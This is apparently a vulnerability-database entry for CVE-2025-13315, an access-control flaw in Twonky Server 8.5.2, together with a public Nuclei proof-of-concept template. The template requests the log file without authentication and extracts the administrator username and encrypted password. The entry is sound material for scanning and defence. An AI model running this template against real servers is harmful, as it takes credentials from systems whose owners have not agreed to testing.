漏洞描述
Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
CVE-2025-13315: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
PoC代码[已公开]
id: CVE-2025-13315
info:
name: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
author: pussycat0x
severity: critical
description: |
Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
remediation: |
Restrict access to the Twonky Server web service API or implement network segmentation as the vendor has not released a fix.
impact: |
Unauthenticated attackers can read sensitive log files containing administrator usernames and encrypted passwords.
reference:
- https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
metadata:
verified: true
zoomeye-query: app="Twonky Server"
tags: cve,cve2025,twonky,server,exposure,unauth,vkev
http:
- method: GET
path:
- "{{BaseURL}}/nmc/rpc/log_getfile"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"server_main_impl","LOG_SYSTEM:","upnp_ini_file")'
condition: and
extractors:
- type: regex
name: username
group: 1
part: body
regex:
- 'accessuser =([ a-zA-Z0-9]+)'
internal: true
- type: regex
name: password
part: body
group: 1
regex:
- 'accesspwd =([ :a-zA-Z0-9]+)'
internal: true
- type: dsl
dsl:
- '"Username :"+ trim(username, "[ ]")'
- '"EncryptedPassword :"+ trim(password, "[ ]")'
# digest: 4a0a004730450220429082d2aa489ae0606c267c76184eddc72ddd9cbc29d705d63a70967c0e95a6022100d0af8450e27beffffcf0145cb940985676eb324bef1ca132e720a12d3f84aa67:922c64590222798bb761d5b6d8e72950